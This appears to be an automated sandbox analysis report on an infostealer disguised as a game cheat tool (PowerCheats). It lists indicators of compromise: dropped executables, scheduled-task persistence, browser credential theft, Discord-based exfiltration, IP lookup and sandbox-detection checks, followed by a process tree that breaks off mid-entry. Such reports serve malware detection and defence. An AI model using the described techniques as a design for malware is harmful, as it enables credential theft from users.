umbral | 87bbdc08df5add73d75325002704ab64c57d7e50ebff97b2fc4155b619eb2704

System Information Discovery

Processes:

PowerCheats.exePowerCheatEmuHider.exePowerCheats.exePowerCheatEmuHider.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation	PowerCheats.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation	PowerCheatEmuHider.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation	PowerCheats.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation	PowerCheatEmuHider.exe

Executes dropped EXE 8 IoCs

Processes:

PowerCheats.exePowerCheatEmuHider.exePowerCheatEmuHider.exePowerCheats.exePowerCheatEmuHider.exePowerCheatEmuHider.exeHiderLdPlayer.execonshost.exe

pid	process
5264	PowerCheats.exe
3508	PowerCheatEmuHider.exe
4456	PowerCheatEmuHider.exe
1968	PowerCheats.exe
4248	PowerCheatEmuHider.exe
1316	PowerCheatEmuHider.exe
6020	HiderLdPlayer.exe
5612	conshost.exe

Loads dropped DLL 64 IoCs

Processes:

WmiApSrv.exetaskmgr.exetaskmgr.exePowerCheats.exePowerCheatEmuHider.exePowerCheatEmuHider.exeHiderLdPlayer.exewmic.exepowershell.exepowershell.exepowershell.exepowershell.exewmic.exewmic.exewmic.exe

pid	process
208
4672
4260
5992
4012	WmiApSrv.exe
4660
5088
1232
5980
5860	taskmgr.exe
5364
4616
3024
6020
3044
3068
5368
2320
4580
5112
704
1544
5376
1088
6000
3996
5852
3432	taskmgr.exe
3748
5156
6012
2320
1332
5872
5360
1968	PowerCheats.exe
4092
4248	PowerCheatEmuHider.exe
1316	PowerCheatEmuHider.exe
4464
892
6128
404
6020	HiderLdPlayer.exe
6120
776	wmic.exe
4724
5800
3748	powershell.exe
696
5308	powershell.exe
5936
5200
876	powershell.exe
4856
5548
1872	powershell.exe
1084
4520
3896	wmic.exe
2972
4416	wmic.exe
4724
5132	wmic.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

368 discord.com
369 discord.com
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

363 ip-api.com

flow	ioc
368	discord.com
369	discord.com

flow	ioc
363	ip-api.com

Drops file in Windows directory 4 IoCs

Processes:

PowerCheatEmuHider.exePowerCheatEmuHider.exe

description	ioc	process
File created	C:\Windows\conshost.exe	PowerCheatEmuHider.exe
File opened for modification	C:\Windows\conshost.exe	PowerCheatEmuHider.exe
File created	C:\Windows\xdwd.dll	PowerCheatEmuHider.exe
File opened for modification	C:\Windows\conshost.exe	PowerCheatEmuHider.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 9 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

taskmgr.exetaskmgr.exetaskmgr.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

firefox.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe

Creates scheduled task(s) 1 TTPs 64 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
4136	schtasks.exe
4208	schtasks.exe
2520	schtasks.exe
4984	schtasks.exe
5968	schtasks.exe
4248	schtasks.exe
3892	schtasks.exe
5308	schtasks.exe
3216	schtasks.exe
3000	schtasks.exe
5276	schtasks.exe
5948	schtasks.exe
5340	schtasks.exe
1448	schtasks.exe
1980	schtasks.exe
5368	schtasks.exe
4660	schtasks.exe
3900	schtasks.exe
5360	schtasks.exe
5444	schtasks.exe
1120	schtasks.exe
1976	schtasks.exe
4280	schtasks.exe
5476	schtasks.exe
1944	schtasks.exe
5240	schtasks.exe
6136	schtasks.exe
5304	schtasks.exe
1384	schtasks.exe
3844	schtasks.exe
5980	schtasks.exe
5968	schtasks.exe
4416	schtasks.exe
1268	schtasks.exe
32	schtasks.exe
1984	schtasks.exe
5840	schtasks.exe
1084	schtasks.exe
5024	schtasks.exe
5956	schtasks.exe
764	schtasks.exe
5276	schtasks.exe
4000	schtasks.exe
816	schtasks.exe
4308	schtasks.exe
3516	schtasks.exe
2064	schtasks.exe
5932	schtasks.exe
1648	schtasks.exe
5428	schtasks.exe
3996	schtasks.exe
6084	schtasks.exe
512	schtasks.exe
5972	schtasks.exe
5968	schtasks.exe
4844	schtasks.exe
5636	schtasks.exe
4604	schtasks.exe
2944	schtasks.exe
1372	schtasks.exe
208	schtasks.exe
2160	schtasks.exe
944	schtasks.exe
4256	schtasks.exe

Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

wmic.exe

pid process

1620 wmic.exe
Modifies registry class 1 IoCs

Processes:

firefox.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings firefox.exe
NTFS ADS 1 IoCs

Processes:

firefox.exe

description ioc process

File created C:\Users\Admin\Downloads\PowerCheats.exe:Zone.Identifier firefox.exe
Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

NOTEPAD.EXE

pid process

1816 NOTEPAD.EXE
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

5812 PING.EXE

pid	process
1620	wmic.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings	firefox.exe

description	ioc	process
File created	C:\Users\Admin\Downloads\PowerCheats.exe:Zone.Identifier	firefox.exe

pid	process
1816	NOTEPAD.EXE

pid	process
5812	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

taskmgr.exePowerCheatEmuHider.exe

pid	process
5824	taskmgr.exe
5824	taskmgr.exe
5824	taskmgr.exe
5824	taskmgr.exe
5824	taskmgr.exe
5824	taskmgr.exe
5824	taskmgr.exe
5824	taskmgr.exe
5824	taskmgr.exe
5824	taskmgr.exe
4456	PowerCheatEmuHider.exe
4456	PowerCheatEmuHider.exe
4456	PowerCheatEmuHider.exe
4456	PowerCheatEmuHider.exe
4456	PowerCheatEmuHider.exe
4456	PowerCheatEmuHider.exe
4456	PowerCheatEmuHider.exe
4456	PowerCheatEmuHider.exe
4456	PowerCheatEmuHider.exe
4456	PowerCheatEmuHider.exe
4456	PowerCheatEmuHider.exe
4456	PowerCheatEmuHider.exe
4456	PowerCheatEmuHider.exe
4456	PowerCheatEmuHider.exe
4456	PowerCheatEmuHider.exe
4456	PowerCheatEmuHider.exe
4456	PowerCheatEmuHider.exe
4456	PowerCheatEmuHider.exe
4456	PowerCheatEmuHider.exe
4456	PowerCheatEmuHider.exe
4456	PowerCheatEmuHider.exe
4456	PowerCheatEmuHider.exe
4456	PowerCheatEmuHider.exe
4456	PowerCheatEmuHider.exe
4456	PowerCheatEmuHider.exe
4456	PowerCheatEmuHider.exe
4456	PowerCheatEmuHider.exe
4456	PowerCheatEmuHider.exe
4456	PowerCheatEmuHider.exe
4456	PowerCheatEmuHider.exe
4456	PowerCheatEmuHider.exe
4456	PowerCheatEmuHider.exe
4456	PowerCheatEmuHider.exe
4456	PowerCheatEmuHider.exe
4456	PowerCheatEmuHider.exe
4456	PowerCheatEmuHider.exe
4456	PowerCheatEmuHider.exe
4456	PowerCheatEmuHider.exe
4456	PowerCheatEmuHider.exe
4456	PowerCheatEmuHider.exe
4456	PowerCheatEmuHider.exe
4456	PowerCheatEmuHider.exe
4456	PowerCheatEmuHider.exe
4456	PowerCheatEmuHider.exe
4456	PowerCheatEmuHider.exe
4456	PowerCheatEmuHider.exe
4456	PowerCheatEmuHider.exe
4456	PowerCheatEmuHider.exe
4456	PowerCheatEmuHider.exe
4456	PowerCheatEmuHider.exe
4456	PowerCheatEmuHider.exe
4456	PowerCheatEmuHider.exe
4456	PowerCheatEmuHider.exe
4456	PowerCheatEmuHider.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

firefox.exePowerCheatEmuHider.exetaskmgr.exetaskmgr.exetaskmgr.exePowerCheatEmuHider.exeHiderLdPlayer.exewmic.exepowershell.exepowershell.exepowershell.exepowershell.exewmic.exe

description	pid	process
Token: SeDebugPrivilege	1468	firefox.exe
Token: SeDebugPrivilege	1468	firefox.exe
Token: SeDebugPrivilege	4456	PowerCheatEmuHider.exe
Token: SeDebugPrivilege	5824	taskmgr.exe
Token: SeSystemProfilePrivilege	5824	taskmgr.exe
Token: SeCreateGlobalPrivilege	5824	taskmgr.exe
Token: SeDebugPrivilege	5860	taskmgr.exe
Token: SeSystemProfilePrivilege	5860	taskmgr.exe
Token: SeCreateGlobalPrivilege	5860	taskmgr.exe
Token: SeDebugPrivilege	1468	firefox.exe
Token: SeDebugPrivilege	1468	firefox.exe
Token: SeDebugPrivilege	1468	firefox.exe
Token: SeDebugPrivilege	3432	taskmgr.exe
Token: SeSystemProfilePrivilege	3432	taskmgr.exe
Token: SeCreateGlobalPrivilege	3432	taskmgr.exe
Token: SeDebugPrivilege	1316	PowerCheatEmuHider.exe
Token: SeDebugPrivilege	6020	HiderLdPlayer.exe
Token: SeIncreaseQuotaPrivilege	776	wmic.exe
Token: SeSecurityPrivilege	776	wmic.exe
Token: SeTakeOwnershipPrivilege	776	wmic.exe
Token: SeLoadDriverPrivilege	776	wmic.exe
Token: SeSystemProfilePrivilege	776	wmic.exe
Token: SeSystemtimePrivilege	776	wmic.exe
Token: SeProfSingleProcessPrivilege	776	wmic.exe
Token: SeIncBasePriorityPrivilege	776	wmic.exe
Token: SeCreatePagefilePrivilege	776	wmic.exe
Token: SeBackupPrivilege	776	wmic.exe
Token: SeRestorePrivilege	776	wmic.exe
Token: SeShutdownPrivilege	776	wmic.exe
Token: SeDebugPrivilege	776	wmic.exe
Token: SeSystemEnvironmentPrivilege	776	wmic.exe
Token: SeRemoteShutdownPrivilege	776	wmic.exe
Token: SeUndockPrivilege	776	wmic.exe
Token: SeManageVolumePrivilege	776	wmic.exe
Token: 33	776	wmic.exe
Token: 34	776	wmic.exe
Token: 35	776	wmic.exe
Token: 36	776	wmic.exe
Token: SeIncreaseQuotaPrivilege	776	wmic.exe
Token: SeSecurityPrivilege	776	wmic.exe
Token: SeTakeOwnershipPrivilege	776	wmic.exe
Token: SeLoadDriverPrivilege	776	wmic.exe
Token: SeSystemProfilePrivilege	776	wmic.exe
Token: SeSystemtimePrivilege	776	wmic.exe
Token: SeProfSingleProcessPrivilege	776	wmic.exe
Token: SeIncBasePriorityPrivilege	776	wmic.exe
Token: SeCreatePagefilePrivilege	776	wmic.exe
Token: SeBackupPrivilege	776	wmic.exe
Token: SeRestorePrivilege	776	wmic.exe
Token: SeShutdownPrivilege	776	wmic.exe
Token: SeDebugPrivilege	776	wmic.exe
Token: SeSystemEnvironmentPrivilege	776	wmic.exe
Token: SeRemoteShutdownPrivilege	776	wmic.exe
Token: SeUndockPrivilege	776	wmic.exe
Token: SeManageVolumePrivilege	776	wmic.exe
Token: 33	776	wmic.exe
Token: 34	776	wmic.exe
Token: 35	776	wmic.exe
Token: 36	776	wmic.exe
Token: SeDebugPrivilege	3748	powershell.exe
Token: SeDebugPrivilege	5308	powershell.exe
Token: SeDebugPrivilege	876	powershell.exe
Token: SeDebugPrivilege	1872	powershell.exe
Token: SeIncreaseQuotaPrivilege	3896	wmic.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

firefox.exetaskmgr.exetaskmgr.exetaskmgr.exe

pid	process
1468	firefox.exe
1468	firefox.exe
1468	firefox.exe
1468	firefox.exe
5824	taskmgr.exe
5824	taskmgr.exe
5824	taskmgr.exe
5824	taskmgr.exe
5824	taskmgr.exe
5824	taskmgr.exe
5824	taskmgr.exe
5824	taskmgr.exe
5824	taskmgr.exe
5824	taskmgr.exe
5824	taskmgr.exe
5824	taskmgr.exe
5824	taskmgr.exe
5824	taskmgr.exe
5824	taskmgr.exe
5824	taskmgr.exe
5824	taskmgr.exe
5824	taskmgr.exe
5824	taskmgr.exe
5824	taskmgr.exe
5824	taskmgr.exe
5824	taskmgr.exe
5824	taskmgr.exe
5824	taskmgr.exe
5824	taskmgr.exe
5824	taskmgr.exe
5824	taskmgr.exe
5824	taskmgr.exe
5824	taskmgr.exe
5824	taskmgr.exe
5824	taskmgr.exe
5824	taskmgr.exe
5824	taskmgr.exe
5824	taskmgr.exe
5824	taskmgr.exe
5824	taskmgr.exe
5860	taskmgr.exe
5860	taskmgr.exe
5860	taskmgr.exe
5860	taskmgr.exe
5860	taskmgr.exe
5860	taskmgr.exe
5860	taskmgr.exe
5860	taskmgr.exe
5860	taskmgr.exe
5860	taskmgr.exe
5860	taskmgr.exe
5860	taskmgr.exe
5860	taskmgr.exe
5860	taskmgr.exe
3432	taskmgr.exe
3432	taskmgr.exe
3432	taskmgr.exe
3432	taskmgr.exe
3432	taskmgr.exe
3432	taskmgr.exe
3432	taskmgr.exe
3432	taskmgr.exe
3432	taskmgr.exe
3432	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

firefox.exetaskmgr.exetaskmgr.exetaskmgr.exe

pid	process
1468	firefox.exe
1468	firefox.exe
1468	firefox.exe
5824	taskmgr.exe
5824	taskmgr.exe
5824	taskmgr.exe
5824	taskmgr.exe
5824	taskmgr.exe
5824	taskmgr.exe
5824	taskmgr.exe
5824	taskmgr.exe
5824	taskmgr.exe
5824	taskmgr.exe
5824	taskmgr.exe
5824	taskmgr.exe
5824	taskmgr.exe
5824	taskmgr.exe
5824	taskmgr.exe
5824	taskmgr.exe
5824	taskmgr.exe
5824	taskmgr.exe
5824	taskmgr.exe
5824	taskmgr.exe
5824	taskmgr.exe
5824	taskmgr.exe
5824	taskmgr.exe
5824	taskmgr.exe
5824	taskmgr.exe
5824	taskmgr.exe
5824	taskmgr.exe
5824	taskmgr.exe
5824	taskmgr.exe
5824	taskmgr.exe
5824	taskmgr.exe
5824	taskmgr.exe
5824	taskmgr.exe
5824	taskmgr.exe
5824	taskmgr.exe
5860	taskmgr.exe
5860	taskmgr.exe
5860	taskmgr.exe
5860	taskmgr.exe
5860	taskmgr.exe
5860	taskmgr.exe
5860	taskmgr.exe
5860	taskmgr.exe
5860	taskmgr.exe
5860	taskmgr.exe
5860	taskmgr.exe
5860	taskmgr.exe
5860	taskmgr.exe
5860	taskmgr.exe
3432	taskmgr.exe
3432	taskmgr.exe
3432	taskmgr.exe
3432	taskmgr.exe
3432	taskmgr.exe
3432	taskmgr.exe
3432	taskmgr.exe
3432	taskmgr.exe
3432	taskmgr.exe
3432	taskmgr.exe
3432	taskmgr.exe
3432	taskmgr.exe

Suspicious use of SetWindowsHookEx 7 IoCs

Processes:

firefox.exe

pid process

1468 firefox.exe
1468 firefox.exe
1468 firefox.exe
1468 firefox.exe
1468 firefox.exe
1468 firefox.exe
1468 firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

firefox.exefirefox.exe

description	pid	process	target process
PID 4876 wrote to memory of 1468	4876	firefox.exe	firefox.exe
PID 4876 wrote to memory of 1468	4876	firefox.exe	firefox.exe
PID 4876 wrote to memory of 1468	4876	firefox.exe	firefox.exe
PID 4876 wrote to memory of 1468	4876	firefox.exe	firefox.exe
PID 4876 wrote to memory of 1468	4876	firefox.exe	firefox.exe
PID 4876 wrote to memory of 1468	4876	firefox.exe	firefox.exe
PID 4876 wrote to memory of 1468	4876	firefox.exe	firefox.exe
PID 4876 wrote to memory of 1468	4876	firefox.exe	firefox.exe
PID 4876 wrote to memory of 1468	4876	firefox.exe	firefox.exe
PID 4876 wrote to memory of 1468	4876	firefox.exe	firefox.exe
PID 4876 wrote to memory of 1468	4876	firefox.exe	firefox.exe
PID 1468 wrote to memory of 3908	1468	firefox.exe	firefox.exe
PID 1468 wrote to memory of 3908	1468	firefox.exe	firefox.exe
PID 1468 wrote to memory of 3908	1468	firefox.exe	firefox.exe
PID 1468 wrote to memory of 3908	1468	firefox.exe	firefox.exe
PID 1468 wrote to memory of 3908	1468	firefox.exe	firefox.exe
PID 1468 wrote to memory of 3908	1468	firefox.exe	firefox.exe
PID 1468 wrote to memory of 3908	1468	firefox.exe	firefox.exe
PID 1468 wrote to memory of 3908	1468	firefox.exe	firefox.exe
PID 1468 wrote to memory of 3908	1468	firefox.exe	firefox.exe
PID 1468 wrote to memory of 3908	1468	firefox.exe	firefox.exe
PID 1468 wrote to memory of 3908	1468	firefox.exe	firefox.exe
PID 1468 wrote to memory of 3908	1468	firefox.exe	firefox.exe
PID 1468 wrote to memory of 3908	1468	firefox.exe	firefox.exe
PID 1468 wrote to memory of 3908	1468	firefox.exe	firefox.exe
PID 1468 wrote to memory of 3908	1468	firefox.exe	firefox.exe
PID 1468 wrote to memory of 3908	1468	firefox.exe	firefox.exe
PID 1468 wrote to memory of 3908	1468	firefox.exe	firefox.exe
PID 1468 wrote to memory of 3908	1468	firefox.exe	firefox.exe
PID 1468 wrote to memory of 3908	1468	firefox.exe	firefox.exe
PID 1468 wrote to memory of 3908	1468	firefox.exe	firefox.exe
PID 1468 wrote to memory of 3908	1468	firefox.exe	firefox.exe
PID 1468 wrote to memory of 3908	1468	firefox.exe	firefox.exe
PID 1468 wrote to memory of 3908	1468	firefox.exe	firefox.exe
PID 1468 wrote to memory of 3908	1468	firefox.exe	firefox.exe
PID 1468 wrote to memory of 3908	1468	firefox.exe	firefox.exe
PID 1468 wrote to memory of 3908	1468	firefox.exe	firefox.exe
PID 1468 wrote to memory of 3908	1468	firefox.exe	firefox.exe
PID 1468 wrote to memory of 3908	1468	firefox.exe	firefox.exe
PID 1468 wrote to memory of 3908	1468	firefox.exe	firefox.exe
PID 1468 wrote to memory of 3908	1468	firefox.exe	firefox.exe
PID 1468 wrote to memory of 3908	1468	firefox.exe	firefox.exe
PID 1468 wrote to memory of 3908	1468	firefox.exe	firefox.exe
PID 1468 wrote to memory of 3908	1468	firefox.exe	firefox.exe
PID 1468 wrote to memory of 3908	1468	firefox.exe	firefox.exe
PID 1468 wrote to memory of 3908	1468	firefox.exe	firefox.exe
PID 1468 wrote to memory of 3908	1468	firefox.exe	firefox.exe
PID 1468 wrote to memory of 3908	1468	firefox.exe	firefox.exe
PID 1468 wrote to memory of 3908	1468	firefox.exe	firefox.exe
PID 1468 wrote to memory of 3908	1468	firefox.exe	firefox.exe
PID 1468 wrote to memory of 3908	1468	firefox.exe	firefox.exe
PID 1468 wrote to memory of 3908	1468	firefox.exe	firefox.exe
PID 1468 wrote to memory of 3908	1468	firefox.exe	firefox.exe
PID 1468 wrote to memory of 3908	1468	firefox.exe	firefox.exe
PID 1468 wrote to memory of 4924	1468	firefox.exe	firefox.exe
PID 1468 wrote to memory of 4924	1468	firefox.exe	firefox.exe
PID 1468 wrote to memory of 4924	1468	firefox.exe	firefox.exe
PID 1468 wrote to memory of 4924	1468	firefox.exe	firefox.exe
PID 1468 wrote to memory of 4924	1468	firefox.exe	firefox.exe
PID 1468 wrote to memory of 4924	1468	firefox.exe	firefox.exe
PID 1468 wrote to memory of 4924	1468	firefox.exe	firefox.exe
PID 1468 wrote to memory of 4924	1468	firefox.exe	firefox.exe
PID 1468 wrote to memory of 4924	1468	firefox.exe	firefox.exe
PID 1468 wrote to memory of 4924	1468	firefox.exe	firefox.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exe

pid process

5968 attrib.exe

pid	process
5968	attrib.exe

C:\Windows\system32\NOTEPAD.EXE
C:\Windows\system32\NOTEPAD.EXE C:\Users\Admin\AppData\Local\Temp\mc.holyworld.ru.txt
1⤵
- Opens file in notepad (likely ransom note)
PID:1816

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4876
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - Modifies registry class
  - NTFS ADS
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:1468
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1468.0.1041041115\345272122" -parentBuildID 20230214051806 -prefsHandle 1756 -prefMapHandle 1748 -prefsLen 22076 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {32dd27c0-4992-42bd-a29b-8d58bddcad57} 1468 "\\.\pipe\gecko-crash-server-pipe.1468" 1848 1cf6de0d858 gpu
    3⤵
    PID:3908
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1468.1.420784061\1492110976" -parentBuildID 20230214051806 -prefsHandle 2400 -prefMapHandle 2388 -prefsLen 22112 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {43b5184b-cb3c-4a64-b364-c852c0fe00c3} 1468 "\\.\pipe\gecko-crash-server-pipe.1468" 2416 1cf61189658 socket
    3⤵
    PID:4924
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1468.2.1673671541\2034008825" -childID 1 -isForBrowser -prefsHandle 2680 -prefMapHandle 2788 -prefsLen 22150 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c971c0e8-2f69-4c20-b61c-7634b3531ded} 1468 "\\.\pipe\gecko-crash-server-pipe.1468" 2808 1cf707e5e58 tab
    3⤵
    PID:2952
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1468.3.1386857886\61569168" -childID 2 -isForBrowser -prefsHandle 3904 -prefMapHandle 3900 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0e4d7ade-55e7-4764-90c9-86f9c39e9789} 1468 "\\.\pipe\gecko-crash-server-pipe.1468" 3908 1cf72df9258 tab
    3⤵
    PID:4932
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1468.4.968917704\1205192986" -childID 3 -isForBrowser -prefsHandle 4036 -prefMapHandle 5244 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {27bc70bd-a5b7-42a1-b416-bb85488bb333} 1468 "\\.\pipe\gecko-crash-server-pipe.1468" 5260 1cf75ed5e58 tab
    3⤵
    PID:4432
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1468.5.1619497916\1361289706" -childID 4 -isForBrowser -prefsHandle 5420 -prefMapHandle 5416 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {21bae44c-5d1d-44cf-a606-c1633a1856fb} 1468 "\\.\pipe\gecko-crash-server-pipe.1468" 5428 1cf75ef1f58 tab
    3⤵
    PID:4648
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1468.6.603394887\1234892366" -childID 5 -isForBrowser -prefsHandle 5612 -prefMapHandle 5608 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4110e71c-84fe-4811-a36a-01eca1d87004} 1468 "\\.\pipe\gecko-crash-server-pipe.1468" 5260 1cf75eef558 tab
    3⤵
    PID:4688
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1468.7.1553145620\1150759375" -childID 6 -isForBrowser -prefsHandle 5908 -prefMapHandle 5900 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {847f57dd-7f1c-4c1d-802c-a5e8cb848382} 1468 "\\.\pipe\gecko-crash-server-pipe.1468" 5896 1cf72b68758 tab
    3⤵
    PID:4520
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1468.8.909606965\1573623847" -childID 7 -isForBrowser -prefsHandle 5912 -prefMapHandle 6060 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {70548bf3-7724-4931-9acb-c625bb9ba1a8} 1468 "\\.\pipe\gecko-crash-server-pipe.1468" 6052 1cf72b67858 tab
    3⤵
    PID:3936
- - C:\Program Files\Mozilla Firefox\firefox.exe
